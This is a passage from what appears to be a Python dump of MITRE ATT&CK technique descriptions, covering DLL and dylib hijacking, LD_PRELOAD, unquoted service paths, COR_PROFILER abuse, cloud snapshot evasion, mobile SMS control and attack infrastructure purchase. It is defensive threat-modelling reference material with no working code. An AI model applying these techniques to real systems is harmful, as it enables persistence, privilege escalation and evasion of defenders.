               'description': 'Adversaries may execute their own malicious payloads by hijacking the search order used '
                              'to load DLLs. Windows systems use a common method to look for required DLLs to load '
                              'into a program. (Citation: Microsoft Dynamic Link Library Search Order) Hijacking DLL '
                              'loads may be for the purpose of establishing persistence as well as elevating '
                              'privileges and/or evading restrictions on file execution.\n'
                              '\n'
                              'There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan '
                              'dynamic-link library files (DLLs) in a directory that will be searched before the '
                              'location of a legitimate library that will be requested by a program, causing Windows '
                              'to load their malicious library when it is called for by the victim program. '
                              'Adversaries may also perform DLL preloading, also called binary planting attacks, '
                              '(Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an '
                              'ambiguously specified DLL in a location that Windows searches before the legitimate '
                              'DLL. Often this location is the current working directory of the program. Remote DLL '
                              'preloading attacks occur when a program sets its current directory to a remote location '
                              'such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory '
                              '2269637)\n'
                              '\n'
                              'Adversaries may also directly modify the way a program loads DLLs by replacing an '
                              'existing DLL or modifying a .manifest or .local redirection file, directory, or '
                              'junction to cause the program to load a different DLL. (Citation: Microsoft '
                              'Dynamic-Link Library Redirection) (Citation: Microsoft Manifests) (Citation: FireEye '
                              'DLL Search Order Hijacking)\n'
                              '\n'
                              'If a search order-vulnerable program is configured to run at a higher privilege level, '
                              'then the adversary-controlled DLL that is loaded will also be executed at the higher '
                              'level. In this case, the technique could be used for privilege escalation from user to '
                              'administrator or SYSTEM or from administrator to SYSTEM, depending on the program.\n'
                              'Programs that fall victim to path hijacking may appear to behave normally because '
                              'malicious DLLs may be configured to also load the legitimate DLLs they were meant to '
                              'replace.',
               'name': 'DLL Search Order Hijacking',
               'platforms': ['Windows']},
 'T1574.002': {'attack_id': 'T1574.002',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking the library manifest '
                              'used to load DLLs. Adversaries may take advantage of vague references in the library '
                              'manifest of a program by replacing a legitimate library with a malicious one, causing '
                              'the operating system to load their malicious library when it is called for by the '
                              'victim program.\n'
                              '\n'
                              'Programs may specify DLLs that are loaded at runtime. Programs that improperly or '
                              'vaguely specify a required DLL may be open to a vulnerability in which an unintended '
                              'DLL is loaded. Side-loading vulnerabilities specifically occur when Windows '
                              'Side-by-Side (WinSxS) manifests (Citation: About Side by Side Assemblies) are not '
                              'explicit enough about characteristics of the DLL to be loaded. Adversaries may take '
                              'advantage of a legitimate program that is vulnerable by replacing the legitimate DLL '
                              'with a malicious one.  (Citation: FireEye DLL Side-Loading)\n'
                              '\n'
                              'Adversaries likely use this technique as a means of masking actions they perform under '
                              'a legitimate, trusted system or software process.',
               'name': 'DLL Side-Loading',
               'platforms': ['Windows']},
 'T1574.004': {'attack_id': 'T1574.004',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking ambiguous paths  used '
                              'to load libraries. Adversaries may plant trojan dynamic libraries, in a directory that '
                              'will be searched by the operating system before the legitimate library specified by the '
                              'victim program, so that their malicious library will be loaded into the victim program '
                              'instead.  MacOS and OS X use a common method to look for required dynamic libraries '
                              '(dylib) to load into a program based on search paths.\n'
                              '\n'
                              'A common method is to see what dylibs an application uses, then plant a malicious '
                              'version with the same name higher up in the search path. This typically results in the '
                              'dylib being in the same folder as the application itself. (Citation: Writing Bad '
                              'Malware for OSX) (Citation: Malware Persistence on OS X)\n'
                              '\n'
                              'If the program is configured to run at a higher privilege level than the current user, '
                              'then when the dylib is loaded into the application, the dylib will also run at that '
                              'elevated level.',
               'name': 'Dylib Hijacking',
               'platforms': ['macOS']},
 'T1574.005': {'attack_id': 'T1574.005',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking the binaries used by '
                              'an installer. These processes may automatically execute specific binaries as part of '
                              'their functionality or to perform other actions. If the permissions on the file system '
                              'directory containing a target binary, or permissions on the binary itself, are '
                              'improperly set, then the target binary may be overwritten with another binary using '
                              'user-level permissions and executed by the original process. If the original process '
                              'and thread are running under a higher permissions level, then the replaced binary will '
                              'also execute under higher-level permissions, which could include SYSTEM.\n'
                              '\n'
                              'Another variation of this technique can be performed by taking advantage of a weakness '
                              'that is common in executable, self-extracting installers. During the installation '
                              'process, it is common for installers to use a subdirectory within the '
                              '<code>%TEMP%</code> directory to unpack binaries such as DLLs, EXEs, or other payloads. '
                              'When installers create subdirectories and files they often do not set appropriate '
                              'permissions to restrict write access, which allows for execution of untrusted code '
                              'placed in the subdirectories or overwriting of binaries used in the installation '
                              'process. This behavior is related to and may take advantage of [DLL Search Order '
                              'Hijacking](https://attack.mitre.org/techniques/T1574/001).\n'
                              '\n'
                              'Adversaries may use this technique to replace legitimate binaries with malicious ones '
                              'as a means of executing code at a higher permissions level. Some installers may also '
                              'require elevated privileges that will result in privilege escalation when executing '
                              'adversary controlled code. This behavior is related to [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002). Several examples of this '
                              'weakness in existing common installers have been reported to software '
                              'vendors.(Citation: mozilla_sec_adv_2012)  (Citation: Executable Installers are '
                              'Vulnerable) If the executing process is set to run at a specific time or during a '
                              'certain event (e.g., system bootup) then this technique can also be used for '
                              'persistence.',
               'name': 'Executable Installer File Permissions Weakness',
               'platforms': ['Windows']},
 'T1574.006': {'attack_id': 'T1574.006',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking the dynamic linker '
                              'used to load libraries. The dynamic linker is used to load shared library dependencies '
                              'needed by an executing program. The dynamic linker will typically check provided '
                              'absolute paths and common directories for these dependencies, but can be overridden by '
                              'shared objects specified by LD_PRELOAD to be loaded before all others.(Citation: Man '
                              'LD.SO)(Citation: TLDP Shared Libraries)\n'
                              '\n'
                              'Adversaries may set LD_PRELOAD to point to malicious libraries that match the name of '
                              'legitimate libraries which are requested by a victim program, causing the operating '
                              "system to load the adversary's malicious code upon execution of the victim program. "
                              'LD_PRELOAD can be set via the environment variable or <code>/etc/ld.so.preload</code> '
                              'file.(Citation: Man LD.SO)(Citation: TLDP Shared Libraries) Libraries specified by '
                              'LD_PRELOAD with be loaded and mapped into memory by <code>dlopen()</code> and '
                              '<code>mmap()</code> respectively.(Citation: Code Injection on Linux and macOS) '
                              '(Citation: Uninformed Needle) (Citation: Phrack halfdead 1997)\n'
                              '\n'
                              "LD_PRELOAD hijacking may grant access to the victim process's memory, system/network "
                              'resources, and possibly elevated privileges. Execution via LD_PRELOAD hijacking may '
                              'also evade detection from security products since the execution is masked under a '
                              'legitimate process.',
               'name': 'LD_PRELOAD',
               'platforms': ['Linux']},
 'T1574.007': {'attack_id': 'T1574.007',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking environment variables '
                              'used to load libraries. Adversaries may place a program in an earlier entry in the list '
                              'of directories stored in the PATH environment variable, which Windows will then execute '
                              'when it searches sequentially through that PATH listing in search of the binary that '
                              'was called from a script or the command line.\n'
                              '\n'
                              'The PATH environment variable contains a list of directories. Certain methods of '
                              'executing a program (namely using cmd.exe or the command-line) rely solely on the PATH '
                              'environment variable to determine the locations that are searched for a program when '
                              'the path for the program is not given. If any directories are listed in the PATH '
                              'environment variable before the Windows directory, <code>%SystemRoot%\\system32</code> '
                              '(e.g., <code>C:\\Windows\\system32</code>), a program may be placed in the preceding '
                              'directory that is named the same as a Windows program (such as cmd, PowerShell, or '
                              'Python), which will be executed when that command is executed from a script or '
                              'command-line.\n'
                              '\n'
                              'For example, if <code>C:\\example path</code> precedes '
                              '</code>C:\\Windows\\system32</code> is in the PATH environment variable, a program that '
                              'is named net.exe and placed in <code>C:\\example path</code> will be called instead of '
                              'the Windows system "net" when "net" is executed from the command-line.',
               'name': 'Path Interception by PATH Environment Variable',
               'platforms': ['Windows']},
 'T1574.008': {'attack_id': 'T1574.008',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking the search order used '
                              'to load other programs. Because some programs do not call other programs using the full '
                              'path, adversaries may place their own file in the directory where the calling program '
                              'is located, causing the operating system to launch their malicious software at the '
                              'request of the calling program.\n'
                              '\n'
                              'Search order hijacking occurs when an adversary abuses the order in which Windows '
                              'searches for programs that are not given a path. Unlike [DLL Search Order '
                              'Hijacking](https://attack.mitre.org/techniques/T1574/001), the search order differs '
                              'depending on the method that is used to execute the program. (Citation: Microsoft '
                              'CreateProcess) (Citation: Windows NT Command Shell) (Citation: Microsoft WinExec) '
                              'However, it is common for Windows to search in the directory of the initiating program '
                              'before searching through the Windows system directory. An adversary who finds a program '
                              'vulnerable to search order hijacking (i.e., a program that does not specify the path to '
                              'an executable) may take advantage of this vulnerability by creating a program named '
                              "after the improperly specified program and placing it within the initiating program's "
                              'directory.\n'
                              '\n'
                              'For example, "example.exe" runs "cmd.exe" with the command-line argument <code>net '
                              'user</code>. An adversary may place a program called "net.exe" within the same '
                              'directory as example.exe, "net.exe" will be run instead of the Windows system utility '
                              'net. In addition, if an adversary places a program called "net.com" in the same '
                              'directory as "net.exe", then <code>cmd.exe /C net user</code> will execute "net.com" '
                              'instead of "net.exe" due to the order of executable extensions defined under PATHEXT. '
                              '(Citation: Microsoft Environment Property)\n'
                              '\n'
                              'Search order hijacking is also a common practice for hijacking DLL loads and is covered '
                              'in [DLL Search Order Hijacking](https://attack.mitre.org/techniques/T1574/001).',
               'name': 'Path Interception by Search Order Hijacking',
               'platforms': ['Windows']},
 'T1574.009': {'attack_id': 'T1574.009',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking vulnerable file path '
                              'references. Adversaries can take advantage of paths that lack surrounding quotations by '
                              'placing an executable in a higher level directory within the path, so that Windows will '
                              "choose the adversary's executable to launch.\n"
                              '\n'
                              'Service paths (Citation: Microsoft CurrentControlSet Services) and shortcut paths may '
                              'also be vulnerable to path interception if the path has one or more spaces and is not '
                              'surrounded by quotation marks (e.g., <code>C:\\unsafe path with '
                              'space\\program.exe</code> vs. <code>"C:\\safe path with space\\program.exe"</code>). '
                              '(Citation: Help eliminate unquoted path) (stored in Windows Registry keys) An adversary '
                              'can place an executable in a higher level directory of the path, and Windows will '
                              'resolve that executable instead of the intended executable. For example, if the path in '
                              'a shortcut is <code>C:\\program files\\myapp.exe</code>, an adversary may create a '
                              'program at <code>C:\\program.exe</code> that will be run instead of the intended '
                              'program. (Citation: Windows Unquoted Services) (Citation: Windows Privilege Escalation '
                              'Guide)\n'
                              '\n'
                              'This technique can be used for persistence if executables are called on a regular '
                              'basis, as well as privilege escalation if intercepted executables are started by a '
                              'higher privileged process.',
               'name': 'Path Interception by Unquoted Path',
               'platforms': ['Windows']},
 'T1574.010': {'attack_id': 'T1574.010',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking the binaries used by '
                              'services. Adversaries may use flaws in the permissions of Windows services to replace '
                              'the binary that is executed upon service start. These service processes may '
                              'automatically execute specific binaries as part of their functionality or to perform '
                              'other actions. If the permissions on the file system directory containing a target '
                              'binary, or permissions on the binary itself are improperly set, then the target binary '
                              'may be overwritten with another binary using user-level permissions and executed by the '
                              'original process. If the original process and thread are running under a higher '
                              'permissions level, then the replaced binary will also execute under higher-level '
                              'permissions, which could include SYSTEM.\n'
                              '\n'
                              'Adversaries may use this technique to replace legitimate binaries with malicious ones '
                              'as a means of executing code at a higher permissions level. If the executing process is '
                              'set to run at a specific time or during a certain event (e.g., system bootup) then this '
                              'technique can also be used for persistence.',
               'name': 'Services File Permissions Weakness',
               'platforms': ['Windows']},
 'T1574.011': {'attack_id': 'T1574.011',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may execute their own malicious payloads by hijacking the Registry entries '
                              'used by services. Adversaries may use flaws in the permissions for registry to redirect '
                              'from the originally specified executable to one that they control, in order to launch '
                              'their own code at Service start.  Windows stores local service configuration '
                              'information in the Registry under '
                              '<code>HKLM\\SYSTEM\\CurrentControlSet\\Services</code>. The information stored under a '
                              "service's Registry keys can be manipulated to modify a service's execution parameters "
                              'through tools such as the service controller, sc.exe,  '
                              '[PowerShell](https://attack.mitre.org/techniques/T1059/001), or '
                              '[Reg](https://attack.mitre.org/software/S0075). Access to Registry keys is controlled '
                              'through Access Control Lists and permissions. (Citation: Registry Key Security)\n'
                              '\n'
                              'If the permissions for users and groups are not properly set and allow access to the '
                              'Registry keys for a service, then adversaries can change the service binPath/ImagePath '
                              'to point to a different executable under their control. When the service starts or is '
                              'restarted, then the adversary-controlled program will execute, allowing the adversary '
                              'to gain persistence and/or privilege escalation to the account context the service is '
                              'set to execute under (local/domain account, SYSTEM, LocalService, or NetworkService).\n'
                              '\n'
                              'Adversaries may also alter Registry keys associated with service failure parameters '
                              '(such as <code>FailureCommand</code>) that may be executed in an elevated context '
                              'anytime the service fails or is intentionally corrupted.(Citation: Kansa Service '
                              'related collectors)(Citation: Tweet Registry Perms Weakness) ',
               'name': 'Services Registry Permissions Weakness',
               'platforms': ['Windows']},
 'T1574.012': {'attack_id': 'T1574.012',
               'categories': ['persistence', 'privilege-escalation', 'defense-evasion'],
               'description': 'Adversaries may leverage the COR_PROFILER environment variable to hijack the execution '
                              'flow of programs that load the .NET CLR. The COR_PROFILER is a .NET Framework feature '
                              'which allows developers to specify an unmanaged (or external of .NET) profiling DLL to '
                              'be loaded into each .NET process that loads the Common Language Runtime (CLR). These '
                              'profiliers are designed to monitor, troubleshoot, and debug managed code executed by '
                              'the .NET CLR.(Citation: Microsoft Profiling Mar 2017)(Citation: Microsoft COR_PROFILER '
                              'Feb 2013)\n'
                              '\n'
                              'The COR_PROFILER environment variable can be set at various scopes (system, user, or '
                              'process) resulting in different levels of influence. System and user-wide environment '
                              'variable scopes are specified in the Registry, where a [Component Object '
                              'Model](https://attack.mitre.org/techniques/T1559/001) (COM) object can be registered as '
                              'a profiler DLL. A process scope COR_PROFILER can also be created in-memory without '
                              'modifying the Registry. Starting with .NET Framework 4, the profiling DLL does not need '
                              'to be registered as long as the location of the DLL is specified in the '
                              'COR_PROFILER_PATH environment variable.(Citation: Microsoft COR_PROFILER Feb 2013)\n'
                              '\n'
                              'Adversaries may abuse COR_PROFILER to establish persistence that executes a malicious '
                              'DLL in the context of all .NET processes every time the CLR is invoked. The '
                              'COR_PROFILER can also be used to elevate privileges (ex: [Bypass User Account '
                              'Control](https://attack.mitre.org/techniques/T1548/002)) if the victim .NET process '
                              'executes at a higher permission level, as well as to hook and [Impair '
                              'Defenses](https://attack.mitre.org/techniques/T1562) provided by .NET '
                              'processes.(Citation: RedCanary Mockingbird May 2020)(Citation: Red Canary COR_PROFILER '
                              'May 2020)(Citation: Almond COR_PROFILER Apr 2019)(Citation: GitHub OmerYa '
                              'Invisi-Shell)(Citation: subTee .NET Profilers May 2017)',
               'name': 'COR_PROFILER',
               'platforms': ['Windows']},
 'T1575': {'attack_id': 'T1575',
           'categories': ['defense-evasion', 'execution'],
           'description': 'Adversaries may use Android’s Native Development Kit (NDK) to write native functions that '
                          'can achieve execution of binaries or functions. Like system calls on a traditional desktop '
                          'operating system, native code achieves execution on a lower level than normal Android SDK '
                          'calls.\n'
                          '\n'
                          'The NDK allows developers to write native code in C or C++ that is compiled directly to '
                          'machine code, avoiding all intermediate languages and steps in compilation that higher '
                          'level languages, like Java, typically have. The Java Native Interface (JNI) is the '
                          'component that allows Java functions in the Android app to call functions in a native '
                          'library.(Citation: Google NDK Getting Started)\n'
                          '\n'
                          'Adversaries may also choose to use native functions to execute malicious code since native '
                          'actions are typically much more difficult to analyze than standard, non-native '
                          'behaviors.(Citation: MITRE App Vetting Effectiveness)',
           'name': 'Native Code',
           'platforms': ['Android']},
 'T1576': {'attack_id': 'T1576',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may include functionality in malware that uninstalls the malicious application '
                          'from the device. This can be achieved by:\n'
                          '\n'
                          '* Abusing device owner permissions to perform silent uninstallation using device owner API '
                          'calls.\n'
                          '* Abusing root permissions to delete files from the filesystem.\n'
                          '* Abusing the accessibility service. This requires an intent be sent to the system to '
                          'request uninstallation, and then abusing the accessibility service to click the proper '
                          'places on the screen to confirm uninstallation.',
           'name': 'Uninstall Malicious Application',
           'platforms': ['Android']},
 'T1577': {'attack_id': 'T1577',
           'categories': ['persistence'],
           'description': 'Adversaries may modify applications installed on a device to establish persistent access to '
                          'a victim. These malicious modifications can be used to make legitimate applications carry '
                          'out adversary tasks when these applications are in use.\n'
                          '\n'
                          'There are multiple ways an adversary can inject malicious code into applications. One '
                          'method is by taking advantages of device vulnerabilities, the most well-known being Janus, '
                          'an Android vulnerability that allows adversaries to add extra bytes to APK (application) '
                          "and DEX (executable) files without affecting the file's signature. By being able to add "
                          'arbitrary bytes to valid applications, attackers can seamlessly inject code into genuine '
                          "executables without the user's knowledge.(Citation: Guardsquare Janus)\n"
                          '\n'
                          'Adversaries may also rebuild applications to include malicious modifications. This can be '
                          'achieved by decompiling the genuine application, merging it with the malicious code, and '
                          'recompiling it.(Citation: CheckPoint Agent Smith)\n'
                          '\n'
                          'Adversaries may also take action to conceal modifications to application executables and '
                          'bypass user consent. These actions include altering modifications to appear as an update or '
                          'exploiting vulnerabilities that allow activities of the malicious application to run inside '
                          'a system application.(Citation: CheckPoint Agent Smith)',
           'name': 'Compromise Application Executable',
           'platforms': ['Android']},
 'T1578': {'attack_id': 'T1578',
           'categories': ['defense-evasion'],
           'description': "An adversary may attempt to modify a cloud account's compute service infrastructure to "
                          'evade defenses. A modification to the compute service infrastructure can include the '
                          'creation, deletion, or modification of one or more components such as compute instances, '
                          'virtual machines, and snapshots.\n'
                          '\n'
                          'Permissions gained from the modification of infrastructure components may bypass '
                          'restrictions that prevent access to existing infrastructure. Modifying infrastructure '
                          'components may also allow an adversary to evade detection and remove evidence of their '
                          'presence.(Citation: Mandiant M-Trends 2020)',
           'name': 'Modify Cloud Compute Infrastructure',
           'platforms': ['AWS', 'GCP', 'Azure']},
 'T1578.001': {'attack_id': 'T1578.001',
               'categories': ['defense-evasion'],
               'description': 'An adversary may create a snapshot or data backup within a cloud account to evade '
                              'defenses. A snapshot is a point-in-time copy of an existing cloud compute component '
                              'such as a virtual machine (VM), virtual hard drive, or volume. An adversary may '
                              'leverage permissions to create a snapshot in order to bypass restrictions that prevent '
                              'access to existing compute service infrastructure, unlike in [Revert Cloud '
                              'Instance](https://attack.mitre.org/techniques/T1536) where an adversary may revert to a '
                              'snapshot to evade detection and remove evidence of their presence.\n'
                              '\n'
                              'An adversary may [Create Cloud '
                              'Instance](https://attack.mitre.org/techniques/T1578/002), mount one or more created '
                              'snapshots to that instance, and then apply a policy that allows the adversary access to '
                              'the created instance, such as a firewall policy that allows them inbound and outbound '
                              'SSH access.(Citation: Mandiant M-Trends 2020)',
               'name': 'Create Snapshot',
               'platforms': ['AWS', 'GCP', 'Azure']},
 'T1578.002': {'attack_id': 'T1578.002',
               'categories': ['defense-evasion'],
               'description': 'An adversary may create a new instance or virtual machine (VM) within the compute '
                              'service of a cloud account to evade defenses. Creating a new instance may allow an '
                              'adversary to bypass firewall rules and permissions that exist on instances currently '
                              'residing within an account. An adversary may [Create '
                              'Snapshot](https://attack.mitre.org/techniques/T1578/001) of one or more volumes in an '
                              'account, create a new instance, mount the snapshots, and then apply a less restrictive '
                              'security policy to collect [Data from Local '
                              'System](https://attack.mitre.org/techniques/T1005) or for [Remote Data '
                              'Staging](https://attack.mitre.org/techniques/T1074/002).(Citation: Mandiant M-Trends '
                              '2020)\n'
                              '\n'
                              'Creating a new instance may also allow an adversary to carry out malicious activity '
                              'within an environment without affecting the execution of current running instances.',
               'name': 'Create Cloud Instance',
               'platforms': ['AWS', 'GCP', 'Azure']},
 'T1578.003': {'attack_id': 'T1578.003',
               'categories': ['defense-evasion'],
               'description': 'An adversary may delete a cloud instance after they have performed malicious activities '
                              'in an attempt to evade detection and remove evidence of their presence.  Deleting an '
                              'instance or virtual machine can remove valuable forensic artifacts and other evidence '
                              'of suspicious behavior if the instance is not recoverable.\n'
                              '\n'
                              'An adversary may also [Create Cloud '
                              'Instance](https://attack.mitre.org/techniques/T1578/002) and later terminate the '
                              'instance after achieving their objectives.(Citation: Mandiant M-Trends 2020)',
               'name': 'Delete Cloud Instance',
               'platforms': ['AWS', 'GCP', 'Azure']},
 'T1578.004': {'attack_id': 'T1578.004',
               'categories': ['defense-evasion'],
               'description': 'An adversary may revert changes made to a cloud instance after they have performed '
                              'malicious activities in attempt to evade detection and remove evidence of their '
                              'presence. In highly virtualized environments, such as cloud-based infrastructure, this '
                              'may be accomplished by restoring virtual machine (VM) or data storage snapshots through '
                              'the cloud management dashboard or cloud APIs.\n'
                              '\n'
                              'Another variation of this technique is to utilize temporary storage attached to the '
                              'compute instance. Most cloud providers provide various types of storage including '
                              'persistent, local, and/or ephemeral, with the ephemeral types often reset upon '
                              'stop/restart of the VM.(Citation: Tech Republic - Restore AWS Snapshots)(Citation: '
                              'Google - Restore Cloud Snapshot)',
               'name': 'Revert Cloud Instance',
               'platforms': ['AWS', 'GCP', 'Azure']},
 'T1579': {'attack_id': 'T1579',
           'categories': ['credential-access'],
           'description': 'Adversaries may collect the keychain storage data from an iOS device to acquire '
                          "credentials. Keychains are the built-in way for iOS to keep track of users' passwords and "
                          'credentials for many services and features such as Wi-Fi passwords, websites, secure notes, '
                          'certificates, private keys, and VPN credentials.\n'
                          '\n'
                          'On the device, the keychain database is stored outside of application sandboxes to prevent '
                          'unauthorized access to the raw data. Standard iOS APIs allow applications access to their '
                          'own keychain contained within the database. By utilizing a privilege escalation exploit or '
                          'existing root access, an adversary can access the entire encrypted database.(Citation: '
                          'Apple Keychain Services)(Citation: Elcomsoft Decrypt Keychain)',
           'name': 'Keychain',
           'platforms': ['iOS']},
 'T1580': {'attack_id': 'T1580',
           'categories': ['discovery'],
           'description': 'An adversary may attempt to discover resources that are available within an '
                          'infrastructure-as-a-service (IaaS) environment. This includes compute service resources '
                          'such as instances, virtual machines, and snapshots as well as resources of other services '
                          'including the storage and database services.\n'
                          '\n'
                          'Cloud providers offer methods such as APIs and commands issued through CLIs to serve '
                          'information about infrastructure. For example, AWS provides a '
                          '<code>DescribeInstances</code> API within the Amazon EC2 API that can return information '
                          'about one or more instances within an account, as well as the <code>ListBuckets</code> API '
                          'that returns a list of all buckets owned by the authenticated sender of the '
                          'request.(Citation: Amazon Describe Instance)(Citation: Amazon Describe Instances API) '
                          "Similarly, GCP's Cloud SDK CLI provides the <code>gcloud compute instances list</code> "
                          'command to list all Google Compute Engine instances in a project(Citation: Google Compute '
                          "Instances), and Azure's CLI command <code>az vm list</code> lists details of virtual "
                          'machines.(Citation: Microsoft AZ CLI)\n'
                          '\n'
                          "An adversary may enumerate resources using a compromised user's access keys to determine "
                          'which are available to that user.(Citation: Expel IO Evil in AWS) The discovery of these '
                          'available resources may help adversaries determine their next steps in the Cloud '
                          'environment, such as establishing Persistence.(Citation: Mandiant M-Trends 2020) Unlike in '
                          '[Cloud Service Discovery](https://attack.mitre.org/techniques/T1526), this technique '
                          'focuses on the discovery of components of the provided services rather than the services '
                          'themselves.',
           'name': 'Cloud Infrastructure Discovery',
           'platforms': ['AWS', 'Azure', 'GCP']},
 'T1581': {'attack_id': 'T1581',
           'categories': ['defense-evasion'],
           'description': 'Adversaries may use a device’s geographical location to limit certain malicious behaviors. '
                          'For example, malware operators may limit the distribution of a second stage payload to '
                          'certain geographic regions.(Citation: Lookout eSurv)\n'
                          '\n'
                          '[Geofencing](https://attack.mitre.org/techniques/T1581) is accomplished by persuading the '
                          'user to grant the application permission to access location services. The application can '
                          'then collect, process, and exfiltrate the device’s location to perform location-based '
                          'actions, such as ceasing malicious behavior or showing region-specific advertisements.\n'
                          '\n'
                          'One method to accomplish [Geofencing](https://attack.mitre.org/techniques/T1581) on Android '
                          'is to use the built-in Geofencing API to automatically trigger certain behaviors when the '
                          'device enters or exits a specified radius around a geographical location. Similar to other '
                          '[Geofencing](https://attack.mitre.org/techniques/T1581) methods, this requires that the '
                          'user has granted the `ACCESS_FINE_LOCATION` and `ACCESS_BACKGROUND_LOCATION` permissions. '
                          'The latter is only required if the application targets Android 10 (API level 29) or higher. '
                          'However, Android 11 introduced additional permission controls that may restrict background '
                          'location collection based on user permission choices at runtime. These additional controls '
                          'include ’Allow only while using the app’, which will effectively prohibit background '
                          'location collection.(Citation: Android Geofencing API)\n'
                          '\n'
                          'Similarly, on iOS, developers can use built-in APIs to setup and execute geofencing. '
                          'Depending on the use case, the app will either need to call '
                          '`requestWhenInUseAuthorization()` or `requestAlwaysAuthorization()`, depending on when '
                          'access to the location services is required. Similar to Android, users also have the option '
                          'to limit when the application can access the device’s location, including one-time use and '
                          'only when the application is running in the foreground.(Citation: Apple Location Services)\n'
                          '\n'
                          '[Geofencing](https://attack.mitre.org/techniques/T1581) can be used to prevent exposure of '
                          'capabilities in environments that are not intended to be compromised or operated within. '
                          'For example, location data could be used to limit malware spread and/or capabilities, which '
                          'could also potentially evade application analysis environments (ex: malware analysis '
                          'outside of the target geographic area). Other malicious usages could include showing '
                          'language-specific [Input Prompt](https://attack.mitre.org/techniques/T1411)s and/or '
                          'advertisements.',
           'name': 'Geofencing',
           'platforms': ['Android', 'iOS']},
 'T1582': {'attack_id': 'T1582',
           'categories': ['impact'],
           'description': 'Adversaries may delete, alter, or send SMS messages without user authorization. This could '
                          'be used to hide C2 SMS messages, spread malware, or various external effects.\n'
                          '\n'
                          'This can be accomplished by requesting the `RECEIVE_SMS` or `SEND_SMS` permissions '
                          'depending on what the malware is attempting to do. If the app is set as the default SMS '
                          'handler on the device, the `SMS_DELIVER` broadcast intent can be registered, which allows '
                          'the app to write to the SMS content provider. The content provider directly modifies the '
                          'messaging database on the device, which could allow malicious applications with this '
                          'ability to insert, modify, or delete arbitrary messages on the device.(Citation: SMS '
                          'KitKat)(Citation: Android SmsProvider)',
           'name': 'SMS Control',
           'platforms': ['Android']},
 'T1583': {'attack_id': 'T1583',
           'categories': ['resource-development'],
           'description': 'Before compromising a victim, adversaries may buy, lease, or rent infrastructure that can '
                          'be used during targeting. A wide variety of infrastructure exists for hosting and '
                          'orchestrating adversary operations. Infrastructure solutions include physical or cloud '
                          'servers, domains, and third-party web services.(Citation: TrendmicroHideoutsLease) '
                          'Additionally, botnets are available for rent or purchase.\n'
                          '\n'
                          'Use of these infrastructure solutions allows an adversary to stage, launch, and execute an '
                          'operation. Solutions may help adversary operations blend in with traffic that is seen as '
                          'normal, such as contact to third-party web services. Depending on the implementation, '
                          'adversaries may use infrastructure that makes it difficult to physically tie back to them '
                          'as well as utilize infrastructure that can be rapidly provisioned, modified, and shut down.',
           'name': 'Acquire Infrastructure',
           'platforms': ['PRE']},
 'T1583.001': {'attack_id': 'T1583.001',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may purchase domains that can be used during '
                              'targeting. Domain names are the human readable names used to represent one or more IP '
                              'addresses. They can be purchased or, in some cases, acquired for free.\n'
                              '\n'
                              'Adversaries can use purchased domains for a variety of purposes, including for '
                              '[Phishing](https://attack.mitre.org/techniques/T1566), [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189), and Command and '
                              'Control.(Citation: CISA MSS Sep 2020) Adversaries may choose domains that are similar '
                              'to legitimate domains, including through use of homoglyphs or use of a different '
                              'top-level domain (TLD).(Citation: FireEye APT28)(Citation: PaypalScam) Typosquatting '
                              'may be used to aid in delivery of payloads via [Drive-by '
                              'Compromise](https://attack.mitre.org/techniques/T1189). Adversaries can also use '
                              'internationalized domain names (IDNs) to create visually similar lookalike domains for '
                              'use in operations.(Citation: CISA IDN ST05-016)\n'
                              '\n'
                              'Domain registrars each maintain a publicly viewable database that displays contact '
                              'information for every registered domain. Private WHOIS services display alternative '
                              'information, such as their own company data, rather than the owner of the domain. '
                              'Adversaries may use such private WHOIS services to obscure information about who owns a '
                              'purchased domain. Adversaries may further interrupt efforts to track their '
                              'infrastructure by using varied registration information and purchasing domains with '
                              'different domain registrars.(Citation: Mandiant APT1)',
               'name': 'Domains',
               'platforms': ['PRE']},
 'T1583.002': {'attack_id': 'T1583.002',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may set up their own Domain Name System (DNS) '
                              'servers that can be used during targeting. During post-compromise activity, adversaries '
                              'may utilize DNS traffic for various tasks, including for Command and Control (ex: '
                              '[Application Layer Protocol](https://attack.mitre.org/techniques/T1071)). Instead of '
                              'hijacking existing DNS servers, adversaries may opt to configure and run their own DNS '
                              'servers in support of operations.\n'
                              '\n'
                              'By running their own DNS servers, adversaries can have more control over how they '
                              'administer server-side DNS C2 traffic '
                              '([DNS](https://attack.mitre.org/techniques/T1071/004)). With control over a DNS server, '
                              'adversaries can configure DNS applications to provide conditional responses to malware '
                              'and, generally, have more flexibility in the structure of the DNS-based C2 '
                              'channel.(Citation: Unit42 DNS Mar 2019)',
               'name': 'DNS Server',
               'platforms': ['PRE']},
 'T1583.003': {'attack_id': 'T1583.003',
               'categories': ['resource-development'],
               'description': 'Before compromising a victim, adversaries may rent Virtual Private Servers (VPSs)\xa0'
                              'that can be used during targeting. There exist a variety of cloud service providers '
                              'that will sell virtual machines/containers as a service. By utilizing a VPS, '
                              'adversaries can make it difficult to physically tie back operations to them. The use of '
                              'cloud infrastructure can also make it easier for adversaries to rapidly provision, '
                              'modify, and shut down their infrastructure.\n'
                              '\n'
                              'Acquiring a VPS for use in later stages of the adversary lifecycle, such as Command and '
